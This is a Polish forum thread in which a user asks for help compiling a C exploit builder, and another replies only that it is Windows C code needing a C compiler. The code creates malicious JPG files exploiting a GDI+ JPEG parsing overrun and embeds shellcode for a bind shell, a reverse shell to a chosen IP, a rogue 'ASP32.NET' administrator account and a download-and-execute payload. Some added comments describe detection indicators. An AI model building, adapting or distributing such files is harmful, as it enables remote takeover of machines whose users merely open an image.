kompilowanie

wrna

Mógłby mi ktoś pomóc przy kompilowaniu tego:

Kod:
#include <direct.h>

#include <windows.h>

#include <winbase.h>

#include <winnls.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <windows.h>

#pragma comment(lib, "ws2_32.lib")



/*
 * Patch helpers: each macro overwrites one field at a constant byte offset
 * inside a payload buffer by storing through a cast pointer.
 *
 * NOTE(review): nothing here checks that the offset lies inside the buffer
 * that is passed in, and the stores go through unsigned short / unsigned long
 * pointers into character arrays; two of the three offsets (235+16, 221+16)
 * are odd, so those stores can be misaligned.
 *
 * Because the offsets are constants, only the patched field differs between
 * generated files; the bytes around it stay the same, which is what a static
 * signature for these payloads can anchor on.
 */
#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+235+16)) = (port)

#define SET_CONNECTBACK_IP(buf, ip)     *(unsigned long *)(((buf)+221+16)) = (ip)

#define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+228+16)) = (port)







//++++++++++++++++++++++++++++++++++++++++++++++++++++++++

//pop up cmd.exe
// NOTE(review): the call target below is a hard-coded absolute address that
// the original comment ties to a single OS build (WinXP SP1). The sequence
// only holds together if system() is loaded at exactly that address, which is
// the assumption that address-space layout randomization takes away.

char shellcode1[]=

"x68"                    // push

"cmd "

"x8BxC4"                // mov eax,esp

"x50"                    // push eax

"xB8x44x80xC2x77"    // mov eax,77c28044h (address of system() on WinXP SP1)

"xFFxD0";                // call eax





//bind cmd.exe on a [port] defined by user

unsigned char shellcode2[] =

"xe8x56x00x00x00x53x55x56x57x8bx6cx24x18x8bx45x3c"

"x8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01xebxe3x32"

"x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38xe0x74x07"

"xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1x8bx5ax24"

"x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01xe8"

"xebx02x31xc0x5fx5ex5dx5bxc2x08x00x5ex6ax30x59x64"

"x8bx19x8bx5bx0cx8bx5bx1cx8bx1bx8bx5bx08x53x68x8e"

"x4ex0execxffxd6x89xc7x81xecx00x01x00x00x57x56x53"

"x89xe5xe8x27x00x00x00x90x01x00x00xb6x19x18xe7xa4"

"x19x70xe9xe5x49x86x49xa4x1ax70xc7xa4xadx2exe9xd9"

"x09xf5xadxcbxedxfcx3bx57x53x32x5fx33x32x00x5bx8d"

"x4bx20x51xffxd7x89xdfx89xc3x8dx75x14x6ax07x59x51"

"x53xffx34x8fxffx55x04x59x89x04x8exe2xf2x2bx27x54"

"xffx37xffx55x30x31xc0x50x50x50x50x40x50x40x50xff"

"x55x2cx89xc7x31xdbx53x53x68x02x00x22x11x89xe0x6a"

"x10x50x57xffx55x24x53x57xffx55x28x53x54x57xffx55"

"x20x89xc7x68x43x4dx44x00x89xe3x87xfax31xc0x8dx7c"

"x24xacx6ax15x59xf3xabx87xfax83xecx54xc6x44x24x10"

"x44x66xc7x44x24x3cx01x01x89x7cx24x48x89x7cx24x4c"

"x89x7cx24x50x8dx44x24x10x54x50x51x51x51x41x51x49"

"x51x51x53x51xffx75x00x68x72xfexb3x16xffx55x04xff"

"xd0x89xe6xffx75x00x68xadxd9x05xcexffx55x04x89xc3"

"x6axffxffx36xffxd3xffx75x00x68x7exd8xe2x73xffx55"

"x04x31xdbx53xffxd0"; 





//It will create a new user account with the username="ASP32.NET"

// and password of "ASP" and add it to the local group "Administrators"
//
// Detection note: going by the description above, a host on which this
// payload ran ends up with a local account named ASP32.NET that is a member
// of the Administrators group. Local account creation and local group
// membership changes are auditable events on Windows, so an unexpected
// account of that name, or an unexplained addition to Administrators, is an
// indicator to alert on and to check for during triage.

char shellcode3[]=

"xfcxe8x56x00x00x00x53x55x56x57x8bx6cx24x18x8bx45"

"x3cx8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01xebxe3"

"x32x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38xe0x74"

"x07xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1x8bx5a"

"x24x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01"

"xe8xebx02x31xc0x5fx5ex5dx5bxc2x08x00x5ex6ax30x59"

"x64x8bx19x8bx5bx0cx8bx5bx1cx8bx1bx8bx5bx08x53x68"

"x8ex4ex0execxffxd6x89xc7xebx18x53x68x98xfex8ax0e"

"xffxd6xffxd0x53x68xefxcexe0x60xffxd6x6ax00xffxd0"

"xffxd0x6ax00xe8xe1xffxffxffx63x6dx64x2ex65x78x65"

"x20x2fx63x20x6ex65x74x20x75x73x65x72x20x41x53x50"

"x33x32x2ex4ex45x54x20x41x53x50x20x2fx41x44x44x20"

"x26x26x20x6ex65x74x20x6cx6fx63x61x6cx67x72x6fx75"

"x70x20x41x64x6dx69x6ex69x73x74x72x61x74x6fx72x73"

"x20x41x53x50x33x32x2ex4ex45x54x20x2fx41x44x44x00";





//connect back to a user defined [ip] and [port]

unsigned char shellcode4[] = 

"xe8x56x00x00x00x53x55x56x57x8bx6cx24x18x8bx45x3c"

"x8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01xebxe3x32"

"x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38xe0x74x07"

"xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1x8bx5ax24"

"x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01xe8"

"xebx02x31xc0x5fx5ex5dx5bxc2x08x00x5ex6ax30x59x64"

"x8bx19x8bx5bx0cx8bx5bx1cx8bx1bx8bx5bx08x53x68x8e"

"x4ex0execxffxd6x89xc7x81xecx00x01x00x00x57x56x53"

"x89xe5xe8x1fx00x00x00x90x01x00x00xb6x19x18xe7xa4"

"x19x70xe9xecxf9xaax60xd9x09xf5xadxcbxedxfcx3bx57"

"x53x32x5fx33x32x00x5bx8dx4bx18x51xffxd7x89xdfx89"

"xc3x8dx75x14x6ax05x59x51x53xffx34x8fxffx55x04x59"

"x89x04x8exe2xf2x2bx27x54xffx37xffx55x28x31xc0x50"

"x50x50x50x40x50x40x50xffx55x24x89xc7x68x7fx00x00"

"x01x68x02x00x22x11x89xe1x6ax10x51x57xffx55x20x59"

"x59x68x43x4dx44x00x89xe3x87xfax31xc0x8dx7cx24xac"

"x6ax15x59xf3xabx87xfax83xecx54xc6x44x24x10x44x66"

"xc7x44x24x3cx01x01x89x7cx24x48x89x7cx24x4cx89x7c"

"x24x50x8dx44x24x10x54x50x51x51x51x41x51x49x51x51"

"x53x51xffx75x00x68x72xfexb3x16xffx55x04xffxd0x89"

"xe6xffx75x00x68xadxd9x05xcexffx55x04x89xc3x6axff"

"xffx36xffxd3xffx75x00x68x7exd8xe2x73xffx55x04x31"

"xdbx53xffxd0";



//donwload from http

char shellcode5[]=

"xEBx0Fx58x80x30x17x40x81x38x6Dx30x30x21x75xF4"

"xEBx05xE8xECxFFxFFxFFxFEx94x16x17x17x4Ax42x26"

"xCCx73x9Cx14x57x84x9Cx54xE8x57x62xEEx9Cx44x14"

"x71x26xC5x71xAFx17x07x71x96x2Dx5Ax4Dx63x10x3E"

"xD5xFExE5xE8xE8xE8x9ExC4x9Cx6Dx2Bx16xC0x14x48"

"x6Fx9Cx5Cx0Fx9Cx64x37x9Cx6Cx33x16xC1x16xC0xEB"

"xBAx16xC7x81x90xEAx46x26xDEx97xD6x18xE4xB1x65"

"x1Dx81x4Ex90xEAx63x05x50x50xF5xF1xA9x18x17x17"

"x17x3ExD9x3ExE0xFExFFxE8xE8xE8x26xD7x71x9Cx10"

"xD6xF7x15x9Cx64x0Bx16xC1x16xD1xBAx16xC7x9ExD1"

"x9ExC0x4Ax9Ax92xB7x17x17x17x57x97x2Fx16x62xED"

"xD1x17x17x9Ax92x0Bx17x17x17x47x40xE8xC1x7Fx13"

"x17x17x17x7Fx17x07x17x17x7Fx68x81x8Fx17x7Fx17"

"x17x17x17xE8xC7x9Ex92x9Ax17x17x17x9Ax92x18x17"

"x17x17x47x40xE8xC1x40x9Ax9Ax42x17x17x17x46xE8"

"xC7x9ExD0x9Ax92x4Ax17x17x17x47x40xE8xC1x26xDE"

"x46x46x46x46x46xE8xC7x9ExD4x9Ax92x7Cx17x17x17"

"x47x40xE8xC1x26xDEx46x46x46x46x9Ax82xB6x17x17"

"x17x45x44xE8xC7x9ExD4x9Ax92x6Bx17x17x17x47x40"

"xE8xC1x9Ax9Ax86x17x17x17x46x7Fx68x81x8Fx17xE8"

"xA2x9Ax17x17x17x44xE8xC7x48x9Ax92x3Ex17x17x17"

"x47x40xE8xC1x7Fx17x17x17x17x9Ax8Ax82x17x17x17"

"x44xE8xC7x9ExD4x9Ax92x26x17x17x17x47x40xE8xC1"

"xE8xA2x86x17x17x17xE8xA2x9Ax17x17x17x44xE8xC7"

"x9Ax92x2Ex17x17x17x47x40xE8xC1x44xE8xC7x9Ax92"

"x56x17x17x17x47x40xE8xC1x7Fx12x17x17x17x9Ax9A"

"x82x17x17x17x46xE8xC7x9Ax92x5Ex17x17x17x47x40"

"xE8xC1x7Fx17x17x17x17xE8xC7xFFx6FxE9xE8xE8x50"

"x72x63x47x65x78x74x56x73x73x65x72x64x64x17x5B"

"x78x76x73x5Bx7Ex75x65x76x65x6Ex56x17x41x7Ex65"

"x63x62x76x7Bx56x7Bx7Bx78x74x17x48x7Bx74x65x72"

"x76x63x17x48x7Bx60x65x7Ex63x72x17x48x7Bx74x7B"

"x78x64x72x17x40x7Ex79x52x6Fx72x74x17x52x6Fx7E"

"x63x47x65x78x74x72x64x64x17x40x7Ex79x5Ex79x72"

"x63x17x5Ex79x63x72x65x79x72x63x58x67x72x79x56"

"x17x5Ex79x63x72x65x79x72x63x58x67x72x79x42x65"

"x7Bx56x17x5Ex79x63x72x65x79x72x63x45x72x76x73"

"x51x7Ex7Bx72x17x17x17x17x17x17x17x17x17x7Ax27"

"x27x39x72x6Fx72x17"

"m00!";







//add other shellcodes that you need here :)

//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



/*
 * Leading bytes of the generated file; main() writes this array first.
 * The values are laid out as JPEG marker segments.
 *
 * NOTE(review): the run written below as xFFxFEx00x01 reads as a JPEG
 * comment (COM) marker followed by a segment length of 1. A JPEG segment
 * length counts its own two bytes, so a value below 2 is malformed; a decoder
 * that subtracts 2 without validating first is left with a wrapped, very
 * large size. This is presumably the condition behind the "GDI+ buffer
 * overrun" named in the banner (confirm against the vendor advisory).
 * For defenders this is the field to check: reject segment lengths below 2 in
 * any decoder, and flag a COM marker with length 0 or 1 when inspecting
 * files or traffic.
 */
char header1[]=

"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x02x00x00x64"

"x00x64x00x00xFFxECx00x11x44x75x63x6Bx79x00x01x00"

"x04x00x00x00x0Ax00x00xFFxEEx00x0Ex41x64x6Fx62x65"

"x00x64xC0x00x00x00x01xFFxFEx00x01x00x14x10x10x19"

"x12x19x27x17x17x27x32xEBx0Fx26x32xDCxB1xE7x70x26"

"x2Ex3Ex35x35x35x35x35x3E";



char setNOPs1[]=

"xE8x00x00x00x00x5Bx8Dx8B"

"x00x05x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8";



char setNOPs2[]=

"x3ExE8x00x00x00x00x5Bx8Dx8B"

"x2Fx00x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8";



char header2[]=

"x44"

"x44x44x44x44x44x44x44x44x44x44x44x44x01x15x19x19"

"x20x1Cx20x26x18x18x26x36x26x20x26x36x44x36x2Bx2B"

"x36x44x44x44x42x35x42x44x44x44x44x44x44x44x44x44"

"x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44"

"x44x44x44x44x44x44x44x44x44x44x44x44x44xFFxC0x00"

"x11x08x03x59x02x2Bx03x01x22x00x02x11x01x03x11x01"

"xFFxC4x00xA2x00x00x02x03x01x01x00x00x00x00x00x00"

"x00x00x00x00x00x03x04x01x02x05x00x06x01x01x01x01"

"x01x00x00x00x00x00x00x00x00x00x00x00x00x01x00x02"

"x03x10x00x02x01x02x04x05x02x03x06x04x05x02x06x01"

"x05x01x01x02x03x00x11x21x31x12x04x41x51x22x13x05"

"x61x32x71x81x42x91xA1xC1x52x23x14xB1xD1x62x15xF0"

"xE1x72x33x06x82x24xF1x92x43x53x34x16xA2xD2x63x83"

"x44x54x25x11x00x02x01x03x02x04x03x08x03x00x02x03"

"x01x00x00x00x00x01x11x21x31x02x41x12xF0x51x61x71"

"x81x91xA1xB1xD1xE1xF1x22x32x42x52xC1x62x13x72x92"

"xD2x03x23x82xFFxDAx00x0Cx03x01x00x02x11x03x11x00"

"x3Fx00x0Fx90xFFx00xBCxDAxB3x36x12xC3xD4xADxC6xDC"

"x45x2FxB2x97xB8x9DxCBx63xFDx26xD4xC6xD7x70xA4x19"

"x24x50xCAx46x2BxFCxEBx3BxC7xC9xA5x4Ax8Fx69x26xDF"

"x6Dx72x4Ax9Ex27x6Bx3ExE6x92x86x24x85x04xDBxEDxA9"

"x64x8Ex6Bx63x67x19x1AxA5xE7xB8x28x3Dx09xABx5Dx5F"

"x16xF7x8CxEDx49x4CxF5x01xE6xE5xD5x1Cx49xABx10x71"

"xA6x36x9Bx93x24x61x00x0Fx61xECx34xA7x9Cx23xF4x96"

"xC6xE6xAFxB7x80x76xEFx93xF0xAAx28x8Ax6BxE0x18xC0"

"xA4x9Bx7Ex90x39x03xC2x90xDCx43x31x91x62x91x86x23"

"x35x35xA2x80x4DxFAx72x31x07x9Dx03x70xA8x93x24x4F"

"x89x51x83x5ExA4x2Ex7AxC0x7DxA9x8Ax10x61x64x07xFA"

"x88xC6x89x26xDAx0Fx20xBDxB9x16xD2xA8xE8x91x3Fx1A"

"xE2xBAxF0xBEx74xABx1DxC4x44x15x1Ax8Ax9CxC7x2Ax6B"

"xA3x33xB7x1Ex88x47x69xA9x64x68x26xC1x97x0BxD6x86"

"x8Bx1Bx29xC6x87xE4xC7xFDxCCx53x11xA5x9Cx62x6AxE5"

"x40x37x61x89xF6xB2x9Cx2Ax7CxFDx05x6Ax30x5Fx52x02"

"xEBx72xBFx7Dx74x4Cx23xB9x8FxD8x78x67x54x59x64x47"

"xC5x75x21x18xD5xE3x58xE1x72x63xBFx6DxBDxCBxCAx82"

"x65xE7xDBx09x54x4Fx0Dx95x86x76xE3xF2xA0x48x82x55"

"xD7xA6xCExA7xAAxDCx6AxF1xA9x8ExE0x35xC1xCAxA1xD4"

"x93xD2xD6x39x95x3Cx6Bx46x60xACxC1x3Bx60xC9x70x84"

"x8ExA1x9Ax9Ax20x01x94xCAx08x91x53xDCx01xB1xB5x12"

"x37x11xC6xC1xACxF1x11xD4x9Cx6Bx3Ex69x76xF0x1Dx7B"

"x52x6DxC9xA8x66x94xBBx79x8Fx7ExDEx17xFDx4DxABx1E"

"x76x7AxA3x2BxE2x50x06xB7x2CxEBx2Ax49xC9xEAx4Ex9B"

"xE7xCAxAFx1ExECx23xDCx8BxE1x6Bx5Fx1Ax9BxE8x49x2E"

"x63xE5x03x32xCDx19xB8x23x10x78x1Fx85x5Cx15x8Cx97"

"x84x9BxDBx15x35x9Fx16xE0x1Ex86xB9x8Fx97x11x4ExDA"

"x35x02x45x25x93xF8x55x24x17xB9x1BxF5xC8x07xA9xE2"

"x2Ax76xB0xC2x37x01x95xADx81xB6x1Cx6AxA2x38xD9xAE"

"xCAx59x18x75x25xFFx00x81xAExD8xE8xBBx47x62xACxB7"

"xB6xA1x8Dx40xE3x86x65x6Dx1ExDBx89x2Fx9DxCDx6Bx24"

"x62x41x61x89xACx2Dx8Bx3ExB6x68xC0x63x73x70x6Bx6B"

"x6AxA1x7AxACx56xE7x11x56x58xD4x13xA4x0BxB6xEBxB3"

"x3Bx47x22x95xD3x53x2ExEAx19x86x96xF7x03x83x52x9E"

"x54xABx6Ex58x63x7Cx33xCEx93xB1x19x1CxE9xDBxAAx35"

"xBFx46x8DxD4xD2x56xE0xE0x33xA1x4Dx0Ax4Ex3BxB1xCD"

"xD4x06x44x56x4AxCDx24x26xEAx6Dx7Ax87xDCx3Bx60x6D"

"xFCx2Ax86x1Bx97x36x6Dx42x04xA0x11xEExE7x46x22x35"

"xD5x26xB0x1Cx0Bx7Cx69x5Fx06xECx5AxC5x0Bx46x70x27"

"xF2xD4x79xADx89xDAx30x74xBDx98xE4x68x58x86xE4x1B"

"x69xB9xDCx2Bx30x87x48x53xC5x85x3BxDDx8Ax4ExB5x42"

"xB2x8Cx6Ex2Cx01xF8x56x04x7BxC9xA3x05x4FxB4xD5xA2"

"xDFxF6xFDxC6xE2xA7x3Cx89x24xFExA9x5ExC3xD4x6DxF7"

"x85xC9x59x39x63x59x9BxFFx00x06x1Ax5ExFAx69x0Ax46"

"x2BxC0x9FxC2x91x8BxC9x40x58x16xBDxF2xC0xD3x3Bx7F"

"x2DxA9xBBx2Ex49x42x6Dx52x70x39x62x9Fx08x73x6Fx20"

"x09x64x00x01x83x2Bx00xD5x97xBCxDCxF6x9CxA7x66xEA"

"xD9xB6x9FxE1x56xDExBAxECx65xB4x44xD8xE3x8Dx52x2F"

"x36xCEx74x33x7Ex9Fx2Ex22x99x8BxC9x6Dx5Ax6Dx9ExA8"

"x22xC7x0CxA8x62x3Dx17x1Dx2FxC8xFAxD4xB0x9Ex14x45"

"x45xD5x6Ex96x04xE1xF1xA0x37x90x5BxD8x7Fx81x57x1B"

"xC8xD5x48x27x0Ex3Cx6Bx3DxCDx44x15x92x41x25x94x82"

"xAEx0Ex42x97x8Dx8Cx6DxAEx56xB8x26xD8x0FxE3x43x93"

"x73x18x75x28xD7xF8xD5xFFx00x74xE4x18xC2x82xACx6F"

"x86x7Fx2Ax4CxBExE5xFCxD2x22xCCx9Ax32xD1x7Cx7Dx68"

;



/*
 * Print the tool's banner to stdout.
 * Takes no arguments, returns nothing, and only calls printf.
 */
void show()

{

        printf("_____________________________________________________________________nn");

        printf("                 .:[Sacred Desciples of Doom]:.                      n");

        printf("  GDI+ buffer overrun Exploit, Modified by Crypto <[email protected]>  n");

        printf("               Greets to FoToZ who found the bug                     n");

        printf("           These Exploit will build malicious JPG File               nn");

        printf("_____________________________________________________________________nn");





}



/*
 * Print the banner followed by the per-mode usage text, then terminate the
 * process with exit status 1; this function does not return to its caller.
 *
 * s is substituted into the usage lines through %s (main passes argv[0]).
 * It is declared as char s[255], but an array parameter is an ordinary
 * char pointer, so the 255 is not enforced on the caller.
 *
 * The banner lines repeat the text printed by show() rather than calling it.
 */
void show_usage(char s[255])

{

        printf("_____________________________________________________________________nn");

        printf("                 .:[Sacred Desciples of Doom]:.                      n");

        printf("  GDI+ buffer overrun Exploit, Modified by Crypto <[email protected]>  n");

        printf("               Greets to FoToZ who found the bug                     n");

        printf("           These Exploit will build malicious JPG File               nn");

        printf("_____________________________________________________________________nn");

        printf("  Usage:                                                              n");

        printf("t%s 1: For lounching a local cmd.exe (not bound to the net)n",s);

        printf("t%s 2 [port]: For lounching cmd.exe on defined [port]n",s);

        printf("t%s 3: For creating a new user accountn",s);

        printf("twith the username="ASP32.NET"n");

        printf("tand password="ASP"and add it to the local group "Administrators"n");

        printf("t%s 4 [ip] [port]: For making a conection to a defined [ip]n",s);

        printf("tand on defined [port] and bind cmd.exe on itn");

        printf("t%s 5 [http]: For downloading and then executing a filen",s);

        /* Usage is only shown on a bad invocation, so always leave with a failure status. */
        exit(1);

}



int main(int argc, char *argv[])

{

        

        FILE *fout;

        unsigned int i=0,j=0;

        unsigned short port=31337;

        unsigned long ip;

        WSADATA wsa; 

         

    

        

        if (argc < 2) { printf("%d",sizeof(shellcode5));

                        show_usage(argv[0]);

                        exit(1);

                        }



        //pop up cmd.exe

        if (atoi(argv[1]) == 1) 

        {

         show();

         mkdir("Crypto");

         fout=fopen("CryptoCrypto1.jpg","wb");



          if( !fout ) {

                       printf("ttErorr:Opening File ...n");

                       exit(1);

                        }







        for(i=0;i<sizeof(shellcode1)-1;i++)

        if( 0xD9FF == *(unsigned short *)&shellcode1[i] ) 

        printf("ttWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODEn");

            



        printf("ttShellcode Size is %u bytesn", sizeof(shellcode1)-1);



        j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;

       

        for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);

        for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);

        for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);



        for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs

        j=i;

        for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode1[i],fout);

        for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);

        for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);



        fprintf(fout,"xFFxD9");

    

        printf("ttOk, Malicious JPG File Created ...nn");

        

        fcloseall();

        }



    //bind cmd.exe on a [port]

    if ((atoi(argv[1]) == 2)) 

        {

         show();

         mkdir("Crypto");

         fout=fopen("CryptoCrypto2.jpg","wb");



          if( !fout ) {

                       printf("ttErorr:Opening File ...n");

                       exit(1);

                        }

        

        // lets initialize the socket library, couse we use htons function 

        if (WSAStartup(MAKEWORD(1,1),&wsa)==SOCKET_ERROR) {

        printf("We got a problem ... Winsock didn't initialize!!n");

        exit(1);

        }

        

        port = atoi(argv[2]);

        SET_PORTBIND_PORT(shellcode2, htons(port));



        for(i=0;i<sizeof(shellcode2)-1;i++)

        if( 0xD9FF == *(unsigned short *)&shellcode2[i] ) 

        printf("ttWarning: Shellcode Contains FFh D9h, Fix Shellcoden");



        printf("ttShellcode Size is %u bytesn", sizeof(shellcode2)-1);



        j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;

       

        for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);

        for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);

        for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);



        for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs

        j=i;

        for(i=0;i<sizeof(shellcode2)-1;i++) fputc(shellcode2[i],fout);

        for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);

        for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);



        fprintf(fout,"xFFxD9");

    

        printf("ttOk, Malicious JPG File Created ...nn");

        

        fcloseall();

        WSACleanup();    

        }



    //Create User "ASP32.NET"

    if (atoi(argv[1]) == 3) 

    {

        show(); 

        mkdir("Crypto");

         fout=fopen("CryptoCrypto3.jpg","wb");



          if( !fout ) {

                       printf("ttErorr:Opening File ...n");

                       exit(1);

                        }







        for(i=0;i<sizeof(shellcode3)-1;i++)

        if( 0xD9FF == *(unsigned short *)&shellcode3[i] ) 

        printf("ttWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODEn");

            



        printf("ttShellcode Size is %u bytesn", sizeof(shellcode3)-1);



        j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;

       

        for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);

        for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);

        for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);



        for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs

        j=i;

        for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode3[i],fout);

        for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);

        for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);



        fprintf(fout,"xFFxD9");

    

        printf("ttOk, Malicious JPG File Created ...nn");

        

        fcloseall();

        }



    //reverse connect back

    if (atoi(argv[1]) == 4)

        {

         show();

         mkdir("Crypto");

         fout=fopen("CryptoCrypto2.jpg","wb");



          if( !fout ) {

                       printf("ttErorr:Opening File ...n");

                       exit(1);

                        }

        

        // let's initialize the socket library, couse we use htons function 

        if (WSAStartup(MAKEWORD(1,1),&wsa)==SOCKET_ERROR) {

        printf("We got a problem ... Winsock didn't initialize!!n");

        exit(1);

        }

        

        ip = inet_addr(argv[2]);

        port = atoi(argv[3]);        

        SET_CONNECTBACK_IP(shellcode4, ip);

        SET_CONNECTBACK_PORT(shellcode4, htons(port));



        for(i=0;i<sizeof(shellcode4)-1;i++)

        if( 0xD9FF == *(unsigned short *)&shellcode4[i] ) 

        printf("ttWarning: Shellcode Contains FFh D9h, Fix Shellcoden");



        printf("ttShellcode Size is %u bytesn", sizeof(shellcode4)-1);



        j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;

       

        for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);

        for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);

        for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);



        for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs

        j=i;

        for(i=0;i<sizeof(shellcode2)-1;i++) fputc(shellcode4[i],fout);

        for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);

        for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);



        fprintf(fout,"xFFxD9");

    

        printf("ttOk, Malicious JPG File Created ...nn");

        

        fcloseall();

        WSACleanup();    

        }



    if (atoi(argv[1]) == 5) 

        {

         show();

         mkdir("Crypto");

         fout=fopen("CryptoCrypto5.jpg","wb");



          if( !fout ) {

                       printf("ttErorr:Opening File ...n");

                       exit(1);

                        }



        strcat(shellcode5,argv[2]);

        strcat(shellcode5,"x01");





        for(i=0;i<sizeof(shellcode5)-1;i++)

        if( 0xD9FF == *(unsigned short *)&shellcode5[i] ) 

        printf("ttWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODEn");

            



        printf("ttShellcode Size is %u bytesn", sizeof(shellcode5)-1);



        j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;

       

        for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);

        for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);

        for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);



        for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs

        j=i;

        for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode5[i],fout);

        for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);

        for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);



        fprintf(fout,"xFFxD9");

    

        printf("ttOk, Malicious JPG File Created ...nn");

        

        fcloseall();

        }



return 0;

}
 

GreEnSnake

Od razu widać, że jest to exploit pisany pod system Windows i jest on napisany w języku C, więc potrzebujesz kompilatora tego właśnie języka...
 